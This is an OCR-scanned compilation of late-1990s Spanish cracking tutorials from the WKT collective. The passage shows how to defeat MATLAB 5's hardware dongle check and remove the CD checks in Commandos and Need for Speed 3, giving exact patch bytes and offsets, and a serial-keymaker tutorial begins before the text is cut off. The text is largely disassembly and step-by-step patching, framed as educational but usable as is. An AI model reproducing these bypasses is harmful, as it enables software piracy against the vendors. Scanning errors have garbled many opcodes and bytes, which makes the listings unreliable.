e Por Orden Alfabético : Util para buscar un programa en 
concreto. 


Pero aún hay más, y son los documentos genéricos, que explican algun 
tema concreto. 

Por ejemplo, la FAQ de Cracking, Cómo Crackear, Introducción al 
Softlce, VBS, .... 

De momento están agrupados en Documentos Genéricos , y si más 
adelante hace falta, ya se dividirán en subgrupos. 


ECD idea original de Mr.Brown. 

Primeras páginas creadas por Mr.Brown, retocadas, mantenidas y 
optimizadas a 800x600 para Netscape y Opera por Mr.WhiTe. 
Cualquier colaboración será bien recibida, así que anímate: 
Haznos llegar tus documentos con este formato 


[4 Fe 133192 
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Crackeando MATLAB 5 A 


Fás Dondle 


: +Cracker 
12E 1998 A RA ST 
is +Altor +HCU student 
> ] dd ; 
' Comentario original de Fravia+ 
VI Win 


Motxilas Documento original 
escrito para Fravia+ 


Estoy desconcertado: el nivel de los tutoriales de 
nuestros compañeros de clase está mejorando 
continuamente, mientras que el nivel de los 
esquemas de protección parece 
(si es que eso es posible) disminuir... ¿depende ello 
del hecho de que la mayor parte de los 
programadores no saben ya (tras tantos años de 
obligada Windows-Lobotomía) cómo funciona el 
código? (y quiero decir código verdadero, 
poderoso, el único sobre el que sientes pasar 

by lentamente tu mirada :-) 
No sé, no entiendo. 
+ Aitor De cualquier forma estoy contento de albergar este 
tutorial de nuestro compañero de clase +Aitor y 
estoy TOTALMENTE de acuerdo con su filosofía: 
"Tenemos (ahora) a nuestro objetivo trabajando 
bien -sin la motxila- pero no estamos satisfechos. 
+Cracker Nosotros no queremos crackear este programa, lo 
HCU Student estamos haciendo para aprender más ... verdadero 
e udent conocimiento será nuestra única satisfacción...” 
Exactamente +crackers! (y ahora esperemos que 
los otros tutoriales de +Aitor de una serie de al 
menos tres arrasen :-) 


Si necesitas más 
información no lo dudes 
y visita su web 


Parte I 


"Un pequeño tutorial para 
mostrar a crackers novatos y 
de nivel intermedio cómo una motxila 
puede ser derrotada fácilmente" 


WKT 
Member 


There is a a crack in everything 
That's how the light gets in 


Nivel (Principiante (x)Intermedio ()Avanzado ( 
)Experto 


Crackeando MATLAB 5 
Parte I: Motxila 


| Introducción 


He elegido este programa porque posee tres niveles de protección: 


1) El programa está protegido con motxila, es decir, una vez instalado no 
funcionará si la llave no está conectada. 


2) Con el programa se incluyen *TODAS* las toolboxes (vendidas aparte) 
pero ello no se menciona en ningún sitio. Estas están incluidas en 
archivos comprimidos .Z de InstallShield que no se pueden descomprimir 

con el des-compresor de InstallShield porque están *ENCRiPTADOS* 
todos los archivos .Z en el CD del Matlab 5 están encriptados. 


3) Una vez que has construido un pequeño decodificador, y todas las 
toolboxes prohibidas están instaladas aparece un chequeo de licencia 


Este tutorial (el primero de una serie de al menos tres) trata sobre el 
primer nivel de protección 


Motxila, llave hardware, pastilla de seguridad ... palabras terribles para 
muchos crackers (principalmente novatos). El objetivo principal de este 
tutorial es mostrar cómo una aplicación comercial protegida con motxila 
puede crackearse en menos de un minuto, igual de fácil que muchos otros 

productos shareware, y si te das unos segundos más de tiempo serás capaz de 

crackear el sistema de protección (probablemente comercial) completo. 


Herramientas necesarias 


Soft-i¡CE v3.2 Win95 (con v2.x bastará; *obligatorio*) 
Tu editor hexadecimal favorito (solo necesario para probar los parches) 
W32Dasm v8.0 (cualquier versión bastará; necesario para una aproximación más profunda) 


Target's URL/FTP 


El programa *NO ES NECESA RIO* para seguir los tutoriales. Recuerda, nosotros no somos solamente 
crackers ... esta serie te enseñará esquemas de protección genéricos, no es mi intención escribir uno más de 
esos ''cómo crackear tal aplicación". De cualquier forma, se trata de software comercial, pero (difícilmente) 
disponible en la red si sabes cómo buscar. 


Historia del Programa 


No hay mucho que decir. Un clásico entre las aplicaciones de cálculo/programación, disponible para 
diferentes sistemas. En mis archivos de software personales (solo con fines educativos :) tengo la versión 3.5f 
para DOS que data de 1989, entonces se trataba de un paquete que incluía PC-Matlab y AT-Matlab, con un 
número de serie como protección. La última versión que conozco es el objetivo de este tutorial, un CD-ROM 


que incluye la versión 5.0 para Win95/NT y la versión 4.2c.1 para Win32s, ambos protegidos con mochila y 
número de serie. 
Si quieres saber más sobre este producto contacta con la página Web de The MathWorks o conéctate a uno 


de los cientos de sitios relativos a Matlab distribuidos por la red. 


Tutorial 


lera APROXiMACiON 
Rápido no-ZEN crack en 1 minuto 


H+++ 
+++ 


Lo primero que necesitamos es instalar el programa ... una instalación 
mínima será suficiente. 


¡A trabajar! Carga Soft-1iCE y ejecuta matlab.exe. Inmediatamente 
el programa te avisa con un mensaje de error: "Error checking out 
MATLAB". Sin cerrar aún la ventana de mensaje entra en Soft-1iCE y 
examina la lista de manejadores de ventana, verás algo como esto: 


Window Handle hQueue SZ QOwner Class Name Window Proc. 
0268 (1) 262£ 32 MATLAB ¿32770 (Dialog) 17e7:4757 
026c (2) 262£ 32 MATLAB Button 17e7:102e 
etCa 
Sí, se trata de nuestra ventana de error y su botón de "OK". Hagamos que 
Soft-iCE interrumpa la ejecución del programa en el momento en que la 
ventana de error sea destruida. Hacer esto nos permitirá localizar las 


instrucciones que hacen aparecer la ventana de error (esto es cierto para 
el 95% de las protecciones que te puedas encontrar, ¿increíble, no?) solo 
con PRETear un poco desde Soft-iCE. De acuerdo, coloquemos nuestro PUNTO 
de RUPTURA: 


bmsg 268 wm_destroy 


y dejemos correr al programa. Justo después de pulsar el botón de "Ok" 
Soft-iCE aparece de nuevo: 


———USER ! GETDLGCTRLiD+001 7-2 
17e7:4757 push bp 

17e7:4758 mov bp,sp 

17e7:475a push 4793 


Unos cuantos comandos PRET desde aquí hasta entrar en el código del 
programa: 


137:4ladco call 6b093c 

137:4ladc5 add esp,14 

137:4ladc8 mov [ebp-20],eax 
137:4ladcb cmp dword ptr [ebp-20],0 
137:4ladcfí jz 4ladff 

137:4laddl cmp dword ptr [6ed6f0],0 
137:4ladd8 jz 4laddf 

137:4ladda call 441544 

137:4laddf push 10 

137:4ladel mov eax,6c1486 
137:4lade6 push eax 

137:4lade7 mov eax, 6c1492 
137:4ladec push eax 

137:4laded push 00 


137:4ladef call cs: [8d0ae4] ¿ventana de error 
=-> 137:4ladf6 mov dword ptr [ebp-24],0 ¿chico malo 
137:4ladfd jmp 4lae06 ¡largo del programa! 
137:4ladff mov dword ptr [ebp-24],1 ¡buen chico, adelante! 
Increible, ¿eh? ¿No lo oyes? ... está diciendo "crackeame" ;-). 


No lo pienses dos veces e intenta un parche (no-ZEN) rápido: 
137:4ladcfí jz 4ladff => 137:4ladcf jmp 4ladff 


Después de testear el parche en memoria con Soft-iCE (funciona bien), será 
fácil parchear el código físicamente: 


MATLAB.EXE, 3.457.536 bytes (pequeñito, ¿eh?) 
Buscar : 74 2e 83 3d 
Sustituir : eb -- -- —-— 


Ahora ejecuta el programa y pruebalo con algunos ejemplos y demos, todo 
funciona perfectamente ... ¿no? 


AZ O O O O + 
+ 2da APROXiMACiON + 
+ Tirando abajo el propio sistema de protección + 
AO O O O no + 


Tenemos a nuestra víctima funcionando perfectamente sin la motxila, pero 
no estamos satisfechos. "Nosotros no queremos crackear el programa, lo 
estamos haciendo para aprender más ... verdadero conocimiento será nuestra 
única satisfacción (aparte de destruir MicroSoft y ver a Mr. Bill Fakes 


crucificado, por supuesto). 


Echemos de nuevo una mirada al programa, y veamos con más profundidad cómo 
funciona el sistema de protección. Para hacer esto tendremos que restaurar 
el ejecutable original matlab.exe sin parchear. Ahora ya estamos listos 


para comenzar, echemos una ojeada al código previo a nuestro primer parche: 


137:4ladb2 push 23 

137:4ladb4 push dword ptr [ebp-1c] 
137:4ladb7 push dword ptr [ebp-18] 
137:4ladba ¡push dword ptr [ebp-14] 
137:4ladbd push dword ptr [ebp-10] 
137:4ladco call 6b093c 

137:4ladc5 add esp, 14 

137:4ladc8 mov [ebp-20],eax 
137:4ladcb cmp dword ptr [ebp-20],0 
137:4ladcfí jz 4ladff 

137:4laddl cmp dword ptr [6ed6f0],0 
137:4ladd8 jz 4laddf 

137:4ladda call 441544 

137:4laddf push 10 


Presta atención y dime qué puede estar pasando en el código anterior. 

Una serie de valores son colocados en la pila, luego se hace una llamada 

a una rutina, y finalmente el valor devuelto en EAX por esa rutina es usado 
para chequear nuestro acceso al programa. Coloquemos un punto de ruptura en 
137:4ladcO y sigamos la pista a la rutina llamada. Después de tracear un 
poco nos vemos aquí: 


-->137:94118a ¡push ebp 
137:94118b mov ebp, esp 
137:94118d push ebx 
137:94118e ¡push esi 
137:94118f£ push edi 
137:941190 mov eax, [ebp+18] 
137:941193 push eax 
137:941194 mov eax, [ebp+14] 
137:941197 push eax 
137:941198 mov eax, [ebp+10] 
137:94119%b push eax 
137:94119c mov eax, [ebp+C] 
137:94119f push eax 
137:9411a0 mov eax, [ebp+8] 
137:9411a3 push eax 
137:9411la4 call 941525 
137:9411la9 add esp, 14 
137:94llac jmp 9411B1 
137:9411b1 pop edi 
137:9411b2 pop esi 
137:9411b3 pop ebx 
137:9411b4 leave 
137:9411b5 ret 14 


Este trozo de código NO ES del propio MATLAB ... ¿dónde puede estar 
localizado? Echa un vistazo al directorio MATLABAbin: 


Directorio de C:IMATLABAbin 
BCCENG-1 BAT 1.426 21/11/96 15:58 bccengmatopts.bat 
BCCOPTS BAT 1.632 21/11/96 15:58 bccopts.bat 


CMEX BAT 2.274 21/11/96 15:58 cmex.bat 
FMEX BAT 2.274 21/11/96 15:58 fmex.bat 
LIBENG DL 29.696 22/11/96 9:51 libeng.dll 
LIBMAT DL 60.416 21/11/96 12:05 libmat.dl1 
LIBMX DL 40.960 21/11/96 12:05 libmx.dl1 
LIBUT DL 40.960 21/11/96 12:05 libut.dll 
MATLAB EXE 3.457.536 06/01/98 7:24 matlab.exe 
MEX BAT 18.152 21/11/96 15:58 mex.bat 
MEDI EXE 144.896 04/12/96 13:43 medit.exe 
MEXOPTS BAT 1.721 21/11/96 15:58 mexopts.bat 
MFC42 D 1.013.520 21/11/96 12:05 mfc42.d11 
MIPC50 DLL 248.320 21/11/96 12:05 mipc50.dl1 
MLAPP TLB 2.789 21/11/96 12:06 mlapp.tlb 
ML_16 D 14.708 21/11/96 12:05 m1_16.d11 
MLPTOOL EXE 42.496 21/11/96 12:05 mlptool.exe 
MSCTOF DLL 31.744 21/11/96 12:05 msctof.dl1l 
MSFOPTS BAT 1.649 21/11/96 15:58 msfopts.bat 
MSVCEN=1 BAT 1.701 21/11/96 15:58 msvcengmatopts.bat 
MSVCIRT D 74.752 21/11/96 12:05 msvcirt.dll 
MSVCOPTS BAT 1.599 21/11/96 15:58 msvcopts.bat 
MSVCRT D 267.536 21/11/96 12:05 msvcrt.dl1l 
MWOLESO5 D 43.520 22/11/96 11:51 mwoles05.dl11 
PERL100 DL 525.312 21/11/96 12:05 per1100.d11 
PERL EXE 36.352 21/11/96 12:05 perl.exe 
SHOWDLLS EXE 49.668 21/11/96 12:05 showdlls.exe 
WATENG=-1 BAT 1.701 21/11/96 15:58 watengmatopts.bat 
WSPTOOL EXE 60.928 21/11/96 12:05 wsptool.exe 
LICENSE DAT 167 06/01/98 7:24 license.dat 
W32SSI DLL 66.560 02/04/96 11:01 w32ssi.dl1l 

31 archivo(s) 6.286.965 bytes 

2 directorio(s) 46.161.920 bytes libres 


La mayoría de los archivos tienen (más o menos) la misma fecha: 21-22/11/96, 
pero hay 4 que no la tienen: 


MATLAB EXE 3.457.536 06/01/98 7:24 matlab.exe 

MEDIT EXE 144.896 04/12/96 13:43 medit.exe 

LICENSE DAT 167 06/01/98 7:24 license.dat 

W32SSI DLL 66.560 02/04/96 11:01 w32ssi.dll 
matlab.exe : ejecutable principal, fecha de instalación 

medit .exe : Matlab editor/debugger 

license.dat : fichero ASCii de licencias, fecha de instalación 
w32ssi.dll : ¿qué demonios puede ser esto? 


Coge tu editor hexadecimal favorito, busca nuestro código y ¡EUREKA! Para 
leerlo mejor coge W32Dasm y obtén el código desensamblado (unos 245 Kb): 


Exported fn(): wSSIEIni - Ord:000Fh 


:40118A 55 push ebp 

:40118B 8BEC mov ebp, esp 
:40118D 53 push ebx 

:40118E 56 push esi 

:40118F 57 push edi 

:401190 8B4518 mov eax, [ebp+18] 
:401193 50 push eax 

:401194 8B4514 mov eax, [ebp+14] 


:401197 50 push eax 


:401198 8B4510 mov eax, [ebp+10] 

:40119B 50 push eax 

:40119C 8B450C mov eax, [ebp+C] 

:40119F 50 push eax 

:4011A0 8B4508 mov eax, [ebp+8] 

:4011A3 50 push eax 

:4011A4 E87C030000 call 401525 <--—— llamada al sistema de chequeo 

:4011A9 83C414 add esp, 14 

:4011AC E900000000 3jmp 4011B1 

:4011B1 5F pop edi 

:4011B2 5E pop esi 

:4011B3 5B pop ebx 

:4011B4 C9 leave 

:4011B5 C21400 ret 14 —<----=--- volvemos a MATLAB 
Si la motxila está instalada esta llamada devuelve EAX = 0. Si no, 
devolverá EAX = -1 (SFFFFFFFF). El objetivo es claro, ¿no? parchearemos 


esta función para que siempre devuelva EAX=0. 


por ejemplo 


:40118A 
:40118B 
:40118D 
:40118E 


Después de probar el parche en memoria con Soft-iCE 


Hay múltiples soluciones, 


55 push ebp :40118A 33c0 xor eax,eax 
8BEC mov ebp,esp =-—N :40118C c21400 ret 14 

53 push ebx =--/ 

56 push esi 


(funciona perfectamente), 


será sencillo parchear el código físicamente: 


W32SSi.DLL, 66.560 bytes 
r : 55 8b ec 53 56 57 8b 45 18 


Busca 
Susti 


Ahora corre el programa y pruebalo, 
(de momento) 
de chequeo de hardware, 


No nos impo 


tuir 


rta 


33 c0 c2 14 00 -- == -—- — 


todo debe funcionar perfectamente 
qué es lo que pasa en el interior de las rutinas 
pero si sigues la pista al código dentro de la DLL 


te encontrarás trozos de código como éste: 


: 401712 
:401713 
: 401718 
: 401719 
:40171F 
:401725 


:40172A 


:40172B 
:401731 
:40173B 
:40173D 
: 401743 
: 401749 
:40174F 
: 401754 


push eax 


mov eax,80992014 


push eax 


push dword ptr [40'70A0] 
call dword ptr [407050] 
mov eax, [4070A0] 


push eax 


call dword ptr [407054] 


mov 
jmp 
mov 
mov 
mov 
mov 


mov ax,8 


dword ptr [4070A0],-1 
40175A 

ebp, [407644] 

esi, [4076A8] 

edi, [4076AC] 

edx, 9966 


401758 out dx,ax 


o éste: 


:40197B mov edx, 9966 
:401980 sub eax,eax 
:401982 in ax, dx 
:401984 cmp ax,9966 
:401988 jne 401A67 
:40198E in al,dx 
:40198F cmp al,55 
:401991 jne 401A67 
:401997 inc edx 
:401998 in al,dx 
:401999 cmp al, 88 
:40199B jne 401A67 
:4019A1 mov edx, 9964 
:4019A6 sub eax,eax 
:4019A8 in ax, dx 
:4019AA and eax,FFFF 
:4019AF mov edx,eax 
:4019B1 cmp ax,1000 
:4019B5 jb 401A67 
:4019BB and al,3 
:4019BD jne 401A67 
:4019C3 mov [4070A4], edx 
:4019C9 mov byte ptr [4070F1],1 
:4019DO jmp 401A67 


material muy interesante, pero no para este tutorial ... tal vez en un 
futuro :) 
Esta segunda aproximación nos proporciona dos iMPORTANTES ventajas 


sobre la primera: 


1) 


2) 


Nuestra víctima solo llama a la rutina de chequeo de la motxila una 
sola vez al arrancar la aplicación, pero te encontrarás programas que 
hacen múltiples llamadas desde cualquier sitio y en cualquier momento 
durante su ejecución. Un ejemplo de esto podría ser AutoCAD 13 de 
AutoDesk. Su sistema de chequeo es prácticamente el mismo, llegas a 
un punto en el que se hace una llamada devolviendo EAX=0 => buen chico, 
y ésta es llamada no solo al comienzo, sino varias veces más mientras 
el programa se está ejecutando. Si tomas como modelo la primera 
aproximación para este tipo de programas, tendrás que parchear 
*cualquier* referencia que exista a la llamada 


Cuando un programador distribuye parte del código en DLLs, lo hace con 
el fin de reducir el tamaño del ejecutable principal liberandole de la 
carga adicional de rutinas que son usadas solo una o dos veces a lo 
largo del programa, pero la mayor parte de las veces lo hace para 


*compartir* rutinas entre diferentes aplicaciones teniendo en 


cuenta la fecha del archivo w32ssi.dll no sería de extrañar 
que nos encontrasemos la misma DLL en otras aplicaciones por ahí, 
ser así nos habríamos cargado un sistema de protección comercial ;¿-). 


y de 


Notas Finales 


Saludos a todos los crackers de Euskal Herria (Pueblo Vasco) 


jotake irabazi arte ! 
(c) 1998 by +Aitor and the +HCU. All rights reserved. 


Ob Duh 


No me molestaré en explicarte que debes COMPRAR este programa si tienes intención de utilizarlo ... esto no es 
shareware ;-). Si eres el propietario de una copia legal del programa, ten en cuenta las leyes de tu país sobre 


ingeniería inversa. 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 
l Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


SN" 
Whiskey Kon Tekila 


Whiskey Kon Tekila 


progrAmA Commandos Behind the Enemy Lines W95 
| DESCripCión [Juego de Estrategia/Acción 
O 
| protECCión ¡Cd-Check. Obliga a poner el Cd para jugar. 
| DiFiCultAD — [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| hErrAmiEntAs — [Softlce 3.22, IDA Pro 3.75, Editor Hexadecimal 
aa MBR 
Lo FECHA ls de Agosto de 198 


Wen 


Introducción 


El programa obliga a tener que poner el CdRom para jugar. 
Así que vamos a eliminar el Cd-Check. 


VM 


Al Atake 


Después de repasar la lista de BreakPoints más típicos (ver Documentos 
Genéricos), me decido a probar con BPX GetDriveTypeA 


Así pues, ejecuto el Commandos, y después me voy al SoftIce(Ctrl+D) para poner 
el BreakPoint(BPX GetDriveTypeA), y vuelvo al juego(FS) 


Ahora voy a empezar una nueva misión para provocar el cd-check. 
Ok, aparezco en el Softlce gracias al BreakPoint. 


Gracias la orden del Softlce P RET(F12), se pueden ver las rutinas por las que va 
pasando el programa. 

Como además tengo el programa desensamblado con el IDA 3.75 Pro, se puede 
deducir que la la rutina que empieza en :4CE880 viene a ser algo así como 
Valida_AFPs. 


Lo que hace esta rutina es buscar en todas las unidades los ficheros tbtp.AFP, 
bbvn.AFP, etao.AFP y btbw.AFP, y comprobar el byte que contienen. 
Finalmente, devuelve EAX=1 si la verificación está OK, y EAXZO si es errónea. 


Como parece que los bytes leídos sólo se usan en ese momento para comprobarlos, 
lo único que importa de la rutina es que devuelva EAX=1. 

Para ello, en :4CE880 pongo : 

:4CE880 xor eax,eax 

:4CE882 inc eax 

:4CE883 ¡mp 4ce9b0 


Para dejar los cambios en el fichero exe, el IDA me indica el offset. 

Así que con un editor hexadecimal(UltraEdit32 p.ej.), en la posición CDC80, 
cambio 

83 EC 0C Al 50 SE 60 00, por 33 CO 40 E9 28 01 00 00 


> , 
VA 


Nota aclaratoria para los ke no sepan usar un editor hexadecimal 


Un lo ke hace normalmente es modificar el fichero .EXE, ke es el ke contiene las 
instrucciones en código máquina (o sea, toda una serie de bytes, ke son los ke 
hacen funcionar el programa). 


Si intentas editar un fichero ejecutable(.EXE) con el Word, el Write, el Notepad,o 
similar, no podrás verlo bién. Para ello necesitas lo ke se llama un editor 
hexadecimal, ke es un programa ke te permite editar los bytes de cualquier fichero. 
Hay muchos editores hexa, algunos gratuitos y otros shareware, como por ejemplo 
el UltraEdit32, el Hview, el HexWorkShop, ..... 


Al editar un fichero .EXE con uno de estos editores, verás muchas parejas de 
números ( y letras de A hasta EF), cada una de ellas es lo ke se llama un byte. 
Para crackear un programa, deberás saber cuales son los bytes ke tienes ke 
cambiar. En este caso, lo sabes ;-) : 

>>Para dejar los cambios en el fichero exe, el IDA me indica el offset. 

>>Así que con un editor hexadecimal(UltraEdit32 p.ej.), en la posición CDC80, 
cambio 

>>83 EC OC A1 50 SF 60 00, por 33 CO 40 E9 28 01 00 00 


Así pues, en este caso deberás ir a la posición CDCS8O0. (es un número en formato 
hexadecimal). 

Todos los editores tienen una opción para ir a una posición determinada. 

Podrás comprobar ke realmente estás en la posición correcta, verificando que son 
los bytes a cambiar : 83 EC 0C A1 50 5F 60 00 

Si has encontrado estos bytes, deberás cambiarlos por 33 CO 40 E9 28 01 00 00 


Entonces salvas los cambios (mejor si te has hecho una copia de seguridad del 
fichero, por si acaso....;-), y ya tienes el programa crackeado. ;-) 

Espero ke te sirva la explicación. Lo único ke necesitas, es un editor hexadecimal. 
Si todavía no tienes ninguno, te recomiendo el UltraEdit32, que puedes encontrar 
en bastantes sitios, por ejemplo en su web de http://www.ultraedit.com 


- 
Vi 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


WKT Tutorialz Site 


Whiskey Kon Tekila 


ProgrAmA NEED FOR SPEED 3 W95 / W98 


EXCELENTE Juego de Coches. 
Sobre todo si dispones de aceleradora 3D. 

Si te encantan este tipo de juegos, te recomiendo que te lo compres. 
No te arrepentiras. 


Tipo Programa Comercial 


Url http://www.nfs3.com 


ProtECCión Cd-Check. Obliga a poner el Cd para jugar. 


DiFiCultAD 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 


DEsCripCión 


| HerrAmiEntAs WDasm32 v8.9, Ultraedit o similar 
O 
ACE MT 


Introducción 


Hace tiempo que tengo este EXCELENTE juego y hoy me ha dado por jugar con él 
pero de otra manera. ;0) El programa obliga a tener que poner el CdRom para jugar. 
Así que vamos a eliminar el Cd-Check. 


Al Atake 


Una vez instalado el juego en su version completa, lo primero es ver cómo reacciona cuando intentamos jugar sin 
el CD. 


Ummm, una bonita nag que nos informa "Para jugar al NEED FOR SPEED 3 Necesita tener el CD del juego en la 
unidad de CD-ROM ". Vaya, esto promete :0) 

Utilizaremos nuestro queridisimo "death listing" o listado muerto y bucearemos en el código una vez 
desensamblado con el Wdasm 8.9. :0) 


Bien... vamos al boton de string references y buscamos la dichosa frasecita. :o( sniff, no sale!! era demasiado facil 
¿no? (en realidad lo es, ya lo veras) 

¿y ahora que hacemos? no podemos localizar la asquerosa nag !! 

¿Que tal si buscamos en las "Imported Functions"? :o) Enseguida localizamos la tipica funcion que se utiliza en 
estos casos: "GetDriveTypeA". Estupendo, hacemos doble click en GetDriveTypeA y el W32Dasm nos lleva al 
siguiente trozo de codigo: 


* Referenced by a CALL at Addresses: 
|:004B635B_ , :004B63BC 


:004F9410 51 push ecx 
:004F9411 52 push edx 
:004F9412 56 push esi 
:004F9413 57 push edi 
:004F9414 83EC04 sub esp, 00000004 
:004F9417 89C2 mov edx, eax 


* Possible StringData Ref from Data Ob3 ->"A:A" 


:004F9419 BE30D95400 mov esi, 0054D930 
:004F941E 89E7 mov edi, esp 
:004F9420 57 push edi 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004F9437 (C) 


:004F9421 8A06 mov al, byte ptr [esi] 
:004F9423 8807 mov byte ptr [edil], al 
:004F9425 3C00 cmp al, 00 

:004F9427 7410 je 004F9439 

:004F9429 8A4601 mov al, byte ptr [esi+01] 
:004F942C 83C602 add esi, 00000002 
:004F942F 884701 mov byte ptr [edi+01], al 
:004F9432 83C702 add edi, 00000002 
:004F9435 3C00 cmp al, 00 

:004F9437 75E8 jne 004F9421 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004F9427 (C) 


:004F9439 5F pop edi 

:004F943A 001424 add byte ptr [espl, dl 
:004F943D 89E0 mov eaX, esp 

:004F943F 50 push eax 


* Reference To: KERNEL32.GetDriveTypeA, Ord:0025h 


:004F9440 2EFF1518455300 Call dword ptr cs:[00534518] <-- Aparecemos aqui 
:004F9447 83F805 cmp eax, 00000005 

:004F944A 7515 jne 004F9461 

:004F944C B801000000 mov eax, 00000001 


:004F9451 83C404 add esp, 00000004 


:004F9454 5F pop edi 


:004F9455 5E pop esi 

:004F9456 5A pop edx 

:004F9457 59 pop ecx 

:004F9458 8D8000000000 lea eax, dword ptr [eax+00000000] 
:004F945E 8BD2 mov edx, edx 


:004F9460 C3 


Si miramos un poco mas arriba veremos que ese trozo de codigo es llamado desde 
* Referenced by a CALL at Addresses: 

1:004B635B , :004B63BC 

Vamos a ver que hay en :004B635B 


* Possible StringData Ref from Data Ob3] ->"install.win" <-- ¿Que coño tendra este archivo? 
| 

:004B633B BA30FE5300 mov edx, 0053FE30 

:004B6340 8D85C4FEFFFF lea eax, dword ptr [ebp+FEFFFFEC4] 

:004B6346 A5 movsd 

:004B6347 A5 movsd 

:004B6348 66A5 MOVSW 

:004B634A AZ movsb 

:004B634B E840300400 call 004F9390 

:004B6350 8D85C4FEFFFF lea eax, dword ptr [ebp+FEFFFFEC4] 

:004B6356 E895300400 call 004F93F0O 

:004B635B E8B0300400 call 004F9410 <-- Llamada al Codigo Anterior 

:004B6360 85C0 test eax, eax 

:004B6362 7430 je 004B6394 <-— Ummm, Salto condicional 7? :0) 

:004B6364 B906000000 mov ecx, 00000006 

:004B6369 8D7DDC lea edi, dword ptr [ebp-24] 

:004B636C BE94564B00 mov esi, 004B5694 

:004B6371 6A30 push 00000030 

:004B6373 A1503A7A00 mov eax, dword ptr [007A3A50] 

:004B6378 F3 repz 

:004B6379 A5 movsd 


* Possible StringData Ref from Data Obj ->"Need For Speed 3" 


:004B637A 683CFE5300 push 0053FE3C 

:004B637F 8B5485DC mov edx, dword ptr [ebp+4*eax-24] 
:004B6383 52 push edx 

:004B6384 6A00 push 00000000 


* Reference To: USER32.MessageBoxA, Ord:001Fh <-- Mal rollito SEGURO :0( 


:004B6386 2EFF1564475300 Call dword ptr cs:[00534764] 
:004B638D 31C0 xor eax, eax 
:004B638F E870990200 call 004DFDO4 


Te has fijado en ese salto condicional en :004B6362 ?? Mosqueante ¿no? :0) y mas abajo una asquerosa MessageBox !! saltemos a ver 
donde nos lleva. Bye bye MessageBox ;0) 


Aparecemos aqui: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004B6362 (C) 

:004B6394 E807FFFFEF call 004B62A0 

:004B6399 85C0 test eax, eax 


:004B639B 755A jne 004B63F7 <-- Otro saltito 


:004B639D 31D2 xor edx, edx <-- Esto ya no huele muy bien 
:004B639F EB19 jmp 004B63BA 


Vamos a seguir el salto de :004B639B ¡ne 004B63F7 
Vaya, justo encima hay un MessageBoxA !!! esto tiene buena pinta. 
Y que pasa con el otro salto? :004B639F jmp 004B63BA 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004B639F (U) 


:004B63BA 89DO mov eax, edx 
:004B63BC E84F300400 call 004F9410 <-- Otra vez? 
:004B63C1 85C0 test eax, eax 
:004B63C3 75DC jne 004B63A1 
:004B63C5 EBED jmp 004B63B4 


Por aqui mal rollo, volvemos al principio y el esquema es similar al anterior. Si siguiesemos por aqui tendriamos que parchear 
:004B63C3 ¡ne 004B63A1 para evitar ese sospechoso MessageBoxA que aparece un poco mas abajo, y con eso tampoco nos 
aseguramos que sea el buen camino. Pero por algo hay que apostar ¿no? 


Vamos a optar por el primer salto :0) 
Cambiaremos: 

:004B639B 755A ¡ne 004B63F7 

Por :004B639B EB5A ¡mp 004B63F7 


Y el otro cambio que teniamos que hacer: 
:004B6362 7430 je 004B6394 
Por :004B6362 EB30 ¡mp 004B6394 


Para parchearlo necesitamos saber el offset, asi que en el W32Dasm nos situamos en la linea en cuestion y lo miramos en la parte de 
abajo de la pantalla. 

Solo necesitamos un editor hexadecimal para probar nuestros cambios. Sacamos el cd del NEED FOR SPEED 3 y probamos el juego. 
Perfecto, parece que funciona . 

AAAAAARGG !!! nag!! nag!! ¿ein? "Openhandlea - OPEN FAILED ON AGameDatalAudioWPcishowS.map” o algo asin :o[ 


Pensemos, nos indica la ruta de un archivo. Miramos en nuestro HD y vemos QUE NO EXISTE ESA CARPETA. ummmmm, que 
mosqueooooo. La copiamos? si pero espera..... recuerdas esa referencia al archivo : 

* Possible StringData Ref from Data Obj ->"install.win" 

Es hora de ver que rayos tiene. Lo abrimos, sorpresa sorpresa!!!! (tranquilo que no te aparece la foca esa de antena3) veras algo asi: 


spanish 

local 

.AGameDataN 

.«AGameDatalTracksNX 
.AGameDatalTracks1TutorX 
.«AGameDatalCarModelX 
.AGameDataMRenderpcA 
«AGameDatalDashHudN 
I:A1GameDatalAudiolpcl <--- La letra de mi CDROM 
.AGameDatalAudio1YSEXA 
.AGameDatalAudiolSpeechYEnglishX 
.AGameDatalAudiolSpeechYGermanX 
.AGameDatalAudiolSpeechYFrenchX 
.AGameDatalAudiolSpeechYSpanishl 
.AGameDatalAudiolSpeechYItaliani 
«AFeDatalartY 

«XFeDataltextX 

«AFeDataltextX 

«XFeDatalsaveN 


«AFeDatalstatsY 

«XFeDatalconfigl 

T:FeDatalaudiol <--- umm FeData, este no lo copie al HD 
«AFeDataNArtYSlidesN 

«AFeDataNArtXTrackN 

«AFeDataNArtYShowcasel 

I:MFeDatalmoviesNX 

«AFeDatalstatsIprhX 


Esta claro, si cambiamos el contenido de el archivo "install.win" quitando la letra del cdrom "I:” y ponemos "." nos buscara los 
archivos necesarios en nuestro HD. :0) 

Pues caña. Probamos..... ummmmm ¡¡ PERFECTO!!! Ya puestos vamos a jugar una partidilla jejeje. Seleccionamos persecucion con 
"El Niño" (Tecleas ELNINO en la pantalla inicial y te sale) y A QUEMAR RUEDAS !!!! 


Realmente me esperaba una proteccion mas currada en este EXCELENTE juego. 
(Repito por si no ha quedado claro que me encanta) 


Los chicos de Electronic Arts deberian leerse algunos textos de Ingenieria Inversa y 
aplicarse el cuento. 


Por cierto, ¿te he dicho ya que este juego se sale y que es una buena opcion de compra? :0) 
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Whiskey Kon Tekila 


Programa Lake Clear Animato v1.0c | W95 / W98 / NT 
| Descripción  [Programilla para crear o retocar Gifs animados. 
A 

Url www.lakeclear.com 


ren Sea me 
[| Dificultad [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
aia Se Ba 
Objetivo [Obtención de un número de Serie Válido y creación de KeyMaker 
ae MARN 
aa a de Re 1 


Introducción 


En este tutorial vamos a examinar una simple rutina de generación de número de 
